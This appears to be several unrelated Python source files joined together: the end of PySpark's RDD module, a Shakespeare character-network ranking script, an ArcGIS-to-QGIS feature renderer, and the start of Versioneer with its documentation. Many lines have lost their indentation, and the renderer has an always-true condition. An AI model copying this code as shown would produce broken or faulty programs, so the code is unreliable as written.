>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd())
return _load_from_socket(port, self._jrdd_deserializer)
def _prepare_for_python_RDD(sc, command):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
        # The broadcast will have the same life cycle as the created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars]
sc._pickled_broadcast_vars.clear()
return pickled_command, broadcast_vars, sc.environment, sc._python_includes
def _wrap_function(sc, func, deserializer, serializer, profiler=None):
assert deserializer, "deserializer should not be empty"
assert serializer, "serializer should not be empty"
command = (func, profiler, deserializer, serializer)
pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command)
return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec,
sc.pythonVer, broadcast_vars, sc._javaAccumulator)
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer,
self._jrdd_deserializer, profiler)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func,
self.preservesPartitioning)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
py | 7dfa1b75d22b9a12a81582318e36bfdcc66ee2ae | #!/usr/bin/env python
# coding: utf-8
import os
from os import listdir
import re
import pandas as pd
from bs4 import BeautifulSoup
import networkx as nx
import matplotlib.pyplot as plt
# Define functions
def list_xmlfiles(directory):
"""
    Return a list of filenames ending in '.xml' in DIRECTORY.
Not strictly necessary but will be useful if we try to scale.
"""
xmlfiles = []
for filename in listdir(directory):
if filename.endswith(".xml"):
xmlfiles.append(filename)
return xmlfiles
def list_textfiles(directory):
"""
Return a list of filenames ending in '.txt' in DIRECTORY.
Not strictly necessary but will be useful if we try to scale.
"""
textfiles = []
for filename in listdir(directory):
if filename.endswith(".txt"):
textfiles.append(filename)
return textfiles
def count_totals(character_list, soup):
    """
    Count the total number of speech acts and words per character in a play,
    using the parsed BeautifulSoup object for that play.
"""
counts = []
for character in character_list:
lines = [[line.text for line in test(['l','p'])] for test in soup.findAll(who=character)]
words = [[word.replace('\n', ' ').replace('\r', '') for word in words] for words in lines]
x = []
for item in words:
for s in item:
x.append(len(re.findall(r'\w+', s)))
speech_acts = len(lines)
total_words = sum(x)
totals = (character, speech_acts, total_words)
counts.append(totals)
df = pd.DataFrame(counts, columns=["character", "lines", "words"])
return df
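# Illustrative use of count_totals (a sketch only: "data/text/Ham.xml" is a
# placeholder path, and the file is assumed to be a TEI-style play whose
# <sp who="..."> elements mark the speeches):
#   soup = BeautifulSoup(open("data/text/Ham.xml").read(), "lxml")
#   speakers = {sp.attrs["who"] for sp in soup.findAll("sp") if "who" in sp.attrs}
#   counts = count_totals(speakers, soup)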
def folger_count(character_list, soup):
"""
Hacky function to deal with Folger Shakespeare editions
"""
counts = []
for character in character_list:
lines = [test('lb') for test in soup.findAll(who=character)]
words = [test('w') for test in soup.findAll(who=character)]
speech_acts = sum([sum(v != 0 for v in i) for i in lines])
total_words = sum([sum(v != 0 for v in i) for i in words])
totals = (character, speech_acts, total_words)
counts.append(totals)
df = pd.DataFrame(counts, columns=["character", "lines", "words"])
return df
def total_rankings(df):
"""
Create count rankings based on word and line lengths.
"""
df["line_rank"] = df["lines"].sort_values(ascending=False).rank(method='dense', ascending=False).astype(int)
df["word_rank"] = df["words"].sort_values(ascending=False).rank(method='dense', ascending=False).astype(int)
df["count_rank"] = ((df["line_rank"] + df["word_rank"])/2).astype(int)
return df
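# Illustrative sketch of total_rankings on a tiny hand-made frame (the numbers
# are invented; kept as a comment so importing this module stays side-effect free):
#   toy = pd.DataFrame({"character": ["Hamlet", "Ophelia"],
#                       "lines": [358, 58], "words": [11563, 1184]})
#   toy = total_rankings(toy)
#   # toy now carries line_rank, word_rank and count_rank columns, with
#   # Hamlet ranked 1 and Ophelia ranked 2 on every measure.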
def metric_rankings(df):
"""
    Create metrics rankings based on node metrics from the graph (.gexf). I don't like this function very much; it's too pandas-y, but it works.
"""
df["WD_rank"] = df["weighted_degree"].sort_values(ascending=False).rank(method='dense', ascending=False).astype(int)
df["EC_rank"] = df["eigenvector"].sort_values(ascending=False).rank(method='dense', ascending=False).astype(int)
df["degree_rank"] = df["degree"].sort_values(ascending=False).rank(method='dense', ascending=False).astype(int)
df["BC_rank"] = df["betweenness"].sort_values(ascending=False).rank(method='dense', ascending=False).astype(int)
df["metrics_rank"] = ((df["WD_rank"] + df["EC_rank"] + df["degree_rank"] + df["BC_rank"])/4).astype(int)
return df
# directory containing the play XML files
indir = os.path.join("data", "text")
def main():
    # Read in plays and create BeautifulSoup object
    for target in [os.path.splitext(f)[0] for f in list_xmlfiles(indir)]:
        print(f"Reading {target}...")
        filename = os.path.join(indir, f"{target}.xml")
with open(filename, 'r') as file:
raw = file.read()
soup = BeautifulSoup(raw, 'lxml')
# create list of characters based on lines
idList = []
for a in soup.findAll('sp'):
if 'who' in a.attrs.keys():
idList.append(a.attrs['who'])
# Only unique characters
unique = set(idList)
# Calculate lines and words for all characters
if target in ("1H4","2H4"):
            out = folger_count(unique, soup)
            totals = out
        else:
            totals = count_totals(unique, soup)
# Cleanup tables and rank measures
cleaned = pd.read_csv(f"../data/character_lists/{target}.csv", header=None)
merged = pd.merge(totals, cleaned, left_on="character", right_on=0)
merged = merged[[1, "lines", "words"]]
merged = merged.dropna()
merged = merged[~merged[1].str.contains('#')]
merged = merged.groupby(1)[['lines', 'words']].sum().reset_index()
merged.columns.values[0] = 'character'
# Calculate + save count ranks
count_ranks = total_rankings(merged)
# Calculate metric measures using networkx
edgelist_df = pd.read_csv(f"../data/edgelists/{target}.csv")
G = nx.from_pandas_edgelist(edgelist_df, "Source", "Target", ["Weight"])
nx.write_gexf(G, f"../data/graphs/{target}.gexf")
plt.figure(figsize=(14,14))
#nx.draw(G, with_labels=True, font_size=20)
#plt.draw()
# betweenness centrality
bcentrality = nx.betweenness_centrality(G, normalized=False)
between = sorted(((float(c), v) for v,c in bcentrality.items()), reverse=True)
# eigenvector centrality
ecentrality = nx.eigenvector_centrality_numpy(G)
eigen = sorted(((float(c), v) for v,c in ecentrality.items()), reverse=True)
# degree and weighted degree
degree = list(map(list, [(k,v) for k, v in nx.degree(G)]))
weighted_degree = list(map(list, [(k,v) for k, v in nx.degree(G, weight="Weight")]))
# merge centrality measures
centrality = pd.merge(pd.DataFrame(between), pd.DataFrame(eigen), on=1)
centrality.columns = ["betweenness", "character", "eigenvector"]
# merge degree measures
degrees = pd.merge(pd.DataFrame(degree), pd.DataFrame(weighted_degree), on=0)
degrees.columns = ["character", "degree", "weighted_degree"]
# merge all
metrics = pd.merge(centrality, degrees, on="character")
metrics = metrics[['character', 'betweenness', 'eigenvector', 'degree', 'weighted_degree']]
# Calculate + save ranked metric measures
metric_ranks = metric_rankings(metrics)
# Check for consistency
        assert len(metric_ranks) == len(count_ranks)
# Combine tables
print(f"Saving data for {target}...")
count_ranks["character"] = [c.strip() for c in count_ranks["character"]]
metric_ranks["character"] = [c.strip() for c in metric_ranks["character"]]
# Save abridged ranks
ranks = pd.merge(count_ranks, metric_ranks, left_on="character", right_on="character")
ranks = ranks[["character", "line_rank", "word_rank", "WD_rank", "BC_rank"]]
ranks.to_csv(f"{target}_abridged_ranks.csv", header=True, sep="\t")
# Create a larger table that brings together all of our desired metrics into a single table.
all_ranks = pd.merge(count_ranks, metric_ranks, left_on="character", right_on="character")
all_ranks = all_ranks[["character", "lines", "words", "degree", "weighted_degree",
"eigenvector", "betweenness", "line_rank", "word_rank", "degree_rank",
"WD_rank","BC_rank", "EC_rank", "count_rank", "metrics_rank"]]
all_ranks.to_csv(f"../data/tables/full/{target}_full_ranks.csv")
# Calculate + save spearman's rho
corr = ranks.corr(method='spearman').round(2)
corr.to_csv(f"{target}.csv",header=True, sep="\t")
if __name__=="__main__":
main()
|
py | 7dfa1bbf5d6f3073a5639f2e4675541d1cb0f356 | import arcpy
from comtypes import COMError
from modules.functions import change_interface
from modules.arcGisModules import ArcGisModules
from renderer.feature.graduatedColorsRenderer import GraduatedColorsRenderer
from renderer.feature.symbols.symbolPropertiesProvider import SymbolPropertiesProvider
from renderer.feature.uniqueValueRenderer import UniqueValueRenderer
from renderer.feature.symbols.simpleSymbol import SimpleSymbol
class FeatureRenderer:
def __init__(self):
pass
@staticmethod
def create_feature_renderer(base):
"""This creates the feature-renderer-element in the DOM
:param base: is the self of the renderer object containing:
base.xml_document = xml_document
base.map_layer_element = map_layer_element
base.arcLayer = arc_layer
base.layer = layer
base.rendererType = renderer_type
"""
renderer = base.xml_document.createElement("renderer-v2")
renderer.setAttribute("forceraster", "0")
renderer.setAttribute("enableorderby", "0")
renderer.setAttribute("symbollevels", "0")
base.map_layer_element.appendChild(renderer)
symbols_element = base.xml_document.createElement("symbols")
renderer.appendChild(symbols_element)
symbols = []
arc_feature_layer = change_interface(base.arcLayer, ArcGisModules.module_carto.IFeatureLayer)
arc_geo_feature_layer = change_interface(arc_feature_layer, ArcGisModules.module_carto.IGeoFeatureLayer)
simple_renderer = arc_geo_feature_layer.Renderer
unique_value_renderer = change_interface(simple_renderer, ArcGisModules.module_carto.IUniqueValueRenderer)
        # Get a feature: usually index 0, but the index can be higher when the
        # objects come from a database (then the object ID is used).
feature = None
try:
for i in range(0, 1000):
try:
feature = arc_feature_layer.FeatureClass.GetFeature(i)
break
except COMError:
i += 1
except AttributeError:
arcpy.AddWarning("\t\tFinding a Feature to render failed.")
print "Something went wrong. Are you using a DB where the IDs start at 1001?"
pass
if base.layer.symbologyType == "OTHER" and not unique_value_renderer:
renderer.setAttribute("type", "singleSymbol")
symbols.append(simple_renderer.SymbolByFeature(feature))
elif base.layer.symbologyType == "UNIQUE_VALUES" or unique_value_renderer:
UniqueValueRenderer.create_unique_values_element(base, renderer, symbols)
elif base.layer.symbologyType == "GRADUATED_COLORS" or "GRADUATED_SYMBOLS":
GraduatedColorsRenderer.create_graduated_colors_element(base, renderer, symbols)
try:
arc_feature_layer = change_interface(base.arcLayer, ArcGisModules.module_carto.IFeatureLayer)
layer_effects = change_interface(arc_feature_layer, ArcGisModules.module_carto.ILayerEffects)
alpha = str(1 - layer_effects.Transparency * 0.01)
except AttributeError:
alpha = "1"
# create the symbol element, one for single symbol, more for graduated or unique values
for count, iSymbol in enumerate(symbols):
symbol_properties = {}
if arc_geo_feature_layer.DisplayFeatureClass.ShapeType == 4:
SymbolPropertiesProvider.get_polygon_properties(symbol_properties, iSymbol)
elif arc_geo_feature_layer.DisplayFeatureClass.ShapeType == 3:
SymbolPropertiesProvider.get_line_properties(symbol_properties, iSymbol)
elif (arc_geo_feature_layer.DisplayFeatureClass.ShapeType == 2) | \
(arc_geo_feature_layer.DisplayFeatureClass.ShapeType == 1):
SymbolPropertiesProvider.get_point_properties(symbol_properties, iSymbol)
SimpleSymbol.create_simple_symbol(base.xml_document, symbols_element, symbol_properties, count, alpha)
|
py | 7dfa1c4c3811467bfc7981bb8cd30ef96928b227 |
# Version: 0.15+dev
"""The Versioneer - like a rocketeer, but for versions.
The Versioneer
==============
* like a rocketeer, but for versions!
* https://github.com/warner/python-versioneer
* Brian Warner
* License: Public Domain
* Compatible With: python2.6, 2.7, 3.2, 3.3, 3.4, and pypy
* [![Latest Version]
(https://pypip.in/version/versioneer/badge.svg?style=flat)
](https://pypi.python.org/pypi/versioneer/)
* [![Build Status]
(https://travis-ci.org/warner/python-versioneer.png?branch=master)
](https://travis-ci.org/warner/python-versioneer)
This is a tool for managing a recorded version number in distutils-based
python projects. The goal is to remove the tedious and error-prone "update
the embedded version string" step from your release process. Making a new
release should be as easy as recording a new tag in your version-control
system, and maybe making new tarballs.
## Quick Install
* `pip install versioneer` to somewhere in your $PATH
* add a `[versioneer]` section to your setup.cfg (see below)
* run `versioneer install` in your source tree, commit the results
## Version Identifiers
Source trees come from a variety of places:
* a version-control system checkout (mostly used by developers)
* a nightly tarball, produced by build automation
* a snapshot tarball, produced by a web-based VCS browser, like github's
"tarball from tag" feature
* a release tarball, produced by "setup.py sdist", distributed through PyPI
Within each source tree, the version identifier (either a string or a number,
this tool is format-agnostic) can come from a variety of places:
* ask the VCS tool itself, e.g. "git describe" (for checkouts), which knows
about recent "tags" and an absolute revision-id
* the name of the directory into which the tarball was unpacked
* an expanded VCS keyword ($Id$, etc)
* a `_version.py` created by some earlier build step
For released software, the version identifier is closely related to a VCS
tag. Some projects use tag names that include more than just the version
string (e.g. "myproject-1.2" instead of just "1.2"), in which case the tool
needs to strip the tag prefix to extract the version identifier. For
unreleased software (between tags), the version identifier should provide
enough information to help developers recreate the same tree, while also
giving them an idea of roughly how old the tree is (after version 1.2, before
version 1.3). Many VCS systems can report a description that captures this,
for example `git describe --tags --dirty --always` reports things like
"0.7-1-g574ab98-dirty" to indicate that the checkout is one revision past the
0.7 tag, has a unique revision id of "574ab98", and is "dirty" (it has
uncommitted changes).
The version identifier is used for multiple purposes:
* to allow the module to self-identify its version: `myproject.__version__`
* to choose a name and prefix for a 'setup.py sdist' tarball
## Theory of Operation
Versioneer works by adding a special `_version.py` file into your source
tree, where your `__init__.py` can import it. This `_version.py` knows how to
dynamically ask the VCS tool for version information at import time.
`_version.py` also contains `$Revision$` markers, and the installation
process marks `_version.py` to have this marker rewritten with a tag name
during the `git archive` command. As a result, generated tarballs will
contain enough information to get the proper version.
To allow `setup.py` to compute a version too, a `versioneer.py` is added to
the top level of your source tree, next to `setup.py` and the `setup.cfg`
that configures it. This overrides several distutils/setuptools commands to
compute the version when invoked, and changes `setup.py build` and `setup.py
sdist` to replace `_version.py` with a small static file that contains just
the generated version data.
## Installation
First, decide on values for the following configuration variables:
* `VCS`: the version control system you use. Currently accepts "git".
* `style`: the style of version string to be produced. See "Styles" below for
details. Defaults to "pep440", which looks like
`TAG[+DISTANCE.gSHORTHASH[.dirty]]`.
* `versionfile_source`:
A project-relative pathname into which the generated version strings should
be written. This is usually a `_version.py` next to your project's main
`__init__.py` file, so it can be imported at runtime. If your project uses
`src/myproject/__init__.py`, this should be `src/myproject/_version.py`.
This file should be checked in to your VCS as usual: the copy created below
by `setup.py setup_versioneer` will include code that parses expanded VCS
keywords in generated tarballs. The 'build' and 'sdist' commands will
replace it with a copy that has just the calculated version string.
This must be set even if your project does not have any modules (and will
therefore never import `_version.py`), since "setup.py sdist" -based trees
still need somewhere to record the pre-calculated version strings. Anywhere
in the source tree should do. If there is a `__init__.py` next to your
`_version.py`, the `setup.py setup_versioneer` command (described below)
will append some `__version__`-setting assignments, if they aren't already
present.
* `versionfile_build`:
Like `versionfile_source`, but relative to the build directory instead of
the source directory. These will differ when your setup.py uses
'package_dir='. If you have `package_dir={'myproject': 'src/myproject'}`,
then you will probably have `versionfile_build='myproject/_version.py'` and
`versionfile_source='src/myproject/_version.py'`.
If this is set to None, then `setup.py build` will not attempt to rewrite
any `_version.py` in the built tree. If your project does not have any
libraries (e.g. if it only builds a script), then you should use
`versionfile_build = None`. To actually use the computed version string,
your `setup.py` will need to override `distutils.command.build_scripts`
with a subclass that explicitly inserts a copy of
`versioneer.get_version()` into your script file. See
`test/demoapp-script-only/setup.py` for an example.
* `tag_prefix`:
a string, like 'PROJECTNAME-', which appears at the start of all VCS tags.
If your tags look like 'myproject-1.2.0', then you should use
tag_prefix='myproject-'. If you use unprefixed tags like '1.2.0', this
should be an empty string, using either `tag_prefix=` or `tag_prefix=''`.
* `parentdir_prefix`:
  an optional string, frequently the same as tag_prefix, which appears at the
start of all unpacked tarball filenames. If your tarball unpacks into
'myproject-1.2.0', this should be 'myproject-'. To disable this feature,
just omit the field from your `setup.cfg`.
This tool provides one script, named `versioneer`. That script has one mode,
"install", which writes a copy of `versioneer.py` into the current directory
and runs `versioneer.py setup` to finish the installation.
To versioneer-enable your project:
* 1: Modify your `setup.cfg`, adding a section named `[versioneer]` and
populating it with the configuration values you decided earlier (note that
the option names are not case-sensitive):
````
[versioneer]
VCS = git
style = pep440
versionfile_source = src/myproject/_version.py
versionfile_build = myproject/_version.py
tag_prefix =
parentdir_prefix = myproject-
````
* 2: Run `versioneer install`. This will do the following:
* copy `versioneer.py` into the top of your source tree
* create `_version.py` in the right place (`versionfile_source`)
* modify your `__init__.py` (if one exists next to `_version.py`) to define
`__version__` (by calling a function from `_version.py`)
* modify your `MANIFEST.in` to include both `versioneer.py` and the
generated `_version.py` in sdist tarballs
`versioneer install` will complain about any problems it finds with your
`setup.py` or `setup.cfg`. Run it multiple times until you have fixed all
the problems.
* 3: add a `import versioneer` to your setup.py, and add the following
arguments to the setup() call:
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
* 4: commit these changes to your VCS. To make sure you won't forget,
`versioneer install` will mark everything it touched for addition using
`git add`. Don't forget to add `setup.py` and `setup.cfg` too.
## Post-Installation Usage
Once established, all uses of your tree from a VCS checkout should get the
current version string. All generated tarballs should include an embedded
version string (so users who unpack them will not need a VCS tool installed).
If you distribute your project through PyPI, then the release process should
boil down to two steps:
* 1: git tag 1.0
* 2: python setup.py register sdist upload
If you distribute it through github (i.e. users use github to generate
tarballs with `git archive`), the process is:
* 1: git tag 1.0
* 2: git push; git push --tags
Versioneer will report "0+untagged.NUMCOMMITS.gHASH" until your tree has at
least one tag in its history.
## Version-String Flavors
Code which uses Versioneer can learn about its version string at runtime by
importing `_version` from your main `__init__.py` file and running the
`get_versions()` function. From the "outside" (e.g. in `setup.py`), you can
import the top-level `versioneer.py` and run `get_versions()`.
Both functions return a dictionary with different flavors of version
information:
* `['version']`: A condensed version string, rendered using the selected
style. This is the most commonly used value for the project's version
string. The default "pep440" style yields strings like `0.11`,
`0.11+2.g1076c97`, or `0.11+2.g1076c97.dirty`. See the "Styles" section
below for alternative styles.
* `['full-revisionid']`: detailed revision identifier. For Git, this is the
full SHA1 commit id, e.g. "1076c978a8d3cfc70f408fe5974aa6c092c949ac".
* `['dirty']`: a boolean, True if the tree has uncommitted changes. Note that
this is only accurate if run in a VCS checkout, otherwise it is likely to
be False or None
* `['error']`: if the version string could not be computed, this will be set
to a string describing the problem, otherwise it will be None. It may be
useful to throw an exception in setup.py if this is set, to avoid e.g.
creating tarballs with a version string of "unknown".
Some variants are more useful than others. Including `full-revisionid` in a
bug report should allow developers to reconstruct the exact code being tested
(or indicate the presence of local changes that should be shared with the
developers). `version` is suitable for display in an "about" box or a CLI
`--version` output: it can be easily compared against release notes and lists
of bugs fixed in various releases.
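For example, in a checkout that is two commits past a "0.11" tag and has local
edits, a call such as the following might return (values illustrative only):
    import versioneer
    versioneer.get_versions()
    # => {'version': '0.11+2.g1076c97.dirty',
    #     'full-revisionid': '1076c978a8d3cfc70f408fe5974aa6c092c949ac',
    #     'dirty': True,
    #     'error': None}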
The installer adds the following text to your `__init__.py` to place a basic
version in `YOURPROJECT.__version__`:
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
## Styles
The setup.cfg `style=` configuration controls how the VCS information is
rendered into a version string.
The default style, "pep440", produces a PEP440-compliant string, equal to the
un-prefixed tag name for actual releases, and containing an additional "local
version" section with more detail for in-between builds. For Git, this is
TAG[+DISTANCE.gHEX[.dirty]] , using information from `git describe --tags
--dirty --always`. For example "0.11+2.g1076c97.dirty" indicates that the
tree is like the "1076c97" commit but has uncommitted changes (".dirty"), and
that this commit is two revisions ("+2") beyond the "0.11" tag. For released
software (exactly equal to a known tag), the identifier will only contain the
stripped tag, e.g. "0.11".
Other styles are available. See details.md in the Versioneer source tree for
descriptions.
## Debugging
Versioneer tries to avoid fatal errors: if something goes wrong, it will tend
to return a version of "0+unknown". To investigate the problem, run `setup.py
version`, which will run the version-lookup code in a verbose mode, and will
display the full contents of `get_versions()` (including the `error` string,
which may help identify what went wrong).
## Updating Versioneer
To upgrade your project to a new release of Versioneer, do the following:
* install the new Versioneer (`pip install -U versioneer` or equivalent)
* edit `setup.cfg`, if necessary, to include any new configuration settings
indicated by the release notes
* re-run `versioneer install` in your source tree, to replace
`SRC/_version.py`
* commit any changed files
### Upgrading to 0.15
Starting with this version, Versioneer is configured with a `[versioneer]`
section in your `setup.cfg` file. Earlier versions required the `setup.py` to
set attributes on the `versioneer` module immediately after import. The new
version will refuse to run (raising an exception during import) until you
have provided the necessary `setup.cfg` section.
In addition, the Versioneer package provides an executable named
`versioneer`, and the installation process is driven by running `versioneer
install`. In 0.14 and earlier, the executable was named
`versioneer-installer` and was run without an argument.
### Upgrading to 0.14
0.14 changes the format of the version string. 0.13 and earlier used
hyphen-separated strings like "0.11-2-g1076c97-dirty". 0.14 and beyond use a
plus-separated "local version" section, with dot-separated
components, like "0.11+2.g1076c97". PEP440-strict tools did not like the old
format, but should be ok with the new one.
### Upgrading from 0.11 to 0.12
Nothing special.
### Upgrading from 0.10 to 0.11
You must add a `versioneer.VCS = "git"` to your `setup.py` before re-running
`setup.py setup_versioneer`. This will enable the use of additional
version-control systems (SVN, etc) in the future.
## Future Directions
This tool is designed to make it easily extended to other version-control
systems: all VCS-specific components are in separate directories like
src/git/ . The top-level `versioneer.py` script is assembled from these
components by running make-versioneer.py . In the future, make-versioneer.py
will take a VCS name as an argument, and will construct a version of
`versioneer.py` that is specific to the given VCS. It might also take the
configuration arguments that are currently provided manually during
installation by editing setup.py . Alternatively, it might go the other
direction and include code from all supported VCS systems, reducing the
number of intermediate scripts.
## License
To make Versioneer easier to embed, all its code is dedicated to the public
domain. The `_version.py` that it creates is also in the public domain.
Specifically, both are released under the Creative Commons "Public Domain
Dedication" license (CC0-1.0), as described in
https://creativecommons.org/publicdomain/zero/1.0/ .
"""
from __future__ import print_function
try:
import configparser
except ImportError:
import ConfigParser as configparser
import errno
import json
import os
import re
import subprocess
import sys
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_root():
"""Get the project root directory.
We require that all commands are run from the project root, i.e. the
directory that contains setup.py, setup.cfg, and versioneer.py .
"""
root = os.path.realpath(os.path.abspath(os.getcwd()))
setup_py = os.path.join(root, "setup.py")
versioneer_py = os.path.join(root, "versioneer.py")
if not (os.path.exists(setup_py) or os.path.exists(versioneer_py)):
# allow 'python path/to/setup.py COMMAND'
root = os.path.dirname(os.path.realpath(os.path.abspath(sys.argv[0])))
setup_py = os.path.join(root, "setup.py")
versioneer_py = os.path.join(root, "versioneer.py")
if not (os.path.exists(setup_py) or os.path.exists(versioneer_py)):
err = ("Versioneer was unable to run the project root directory. "
"Versioneer requires setup.py to be executed from "
"its immediate directory (like 'python setup.py COMMAND'), "
"or in a way that lets it use sys.argv[0] to find the root "
"(like 'python path/to/setup.py COMMAND').")
raise VersioneerBadRootError(err)
try:
# Certain runtime workflows (setup.py install/develop in a setuptools
# tree) execute all dependencies in a single python process, so
# "versioneer" may be imported multiple times, and python's shared
# module-import table will cache the first one. So we can't use
# os.path.dirname(__file__), as that will find whichever
# versioneer.py was first imported, even in later projects.
me = os.path.realpath(os.path.abspath(__file__))
if os.path.splitext(me)[0] != os.path.splitext(versioneer_py)[0]:
print("Warning: build in %s is using versioneer.py from %s"
% (os.path.dirname(me), versioneer_py))
except NameError:
pass
return root
def get_config_from_root(root):
"""Read the project setup.cfg file to determine Versioneer config."""
# This might raise EnvironmentError (if setup.cfg is missing), or
# configparser.NoSectionError (if it lacks a [versioneer] section), or
# configparser.NoOptionError (if it lacks "VCS="). See the docstring at
# the top of versioneer.py for instructions on writing your setup.cfg .
setup_cfg = os.path.join(root, "setup.cfg")
parser = configparser.SafeConfigParser()
with open(setup_cfg, "r") as f:
parser.readfp(f)
VCS = parser.get("versioneer", "VCS") # mandatory
def get(parser, name):
if parser.has_option("versioneer", name):
return parser.get("versioneer", name)
return None
cfg = VersioneerConfig()
cfg.VCS = VCS
cfg.style = get(parser, "style") or ""
cfg.versionfile_source = get(parser, "versionfile_source")
cfg.versionfile_build = get(parser, "versionfile_build")
cfg.tag_prefix = get(parser, "tag_prefix")
if cfg.tag_prefix in ("''", '""'):
cfg.tag_prefix = ""
cfg.parentdir_prefix = get(parser, "parentdir_prefix")
cfg.verbose = get(parser, "verbose")
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
# these dictionaries contain VCS-specific tools
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
return None
return stdout
LONG_VERSION_PY['git'] = '''
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by github's download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.15+dev (https://github.com/warner/python-versioneer)
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "%(DOLLAR)sFormat:%%d%(DOLLAR)s"
git_full = "%(DOLLAR)sFormat:%%H%(DOLLAR)s"
keywords = {"refnames": git_refnames, "full": git_full}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "%(STYLE)s"
cfg.tag_prefix = "%(TAG_PREFIX)s"
cfg.parentdir_prefix = "%(PARENTDIR_PREFIX)s"
cfg.versionfile_source = "%(VERSIONFILE_SOURCE)s"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
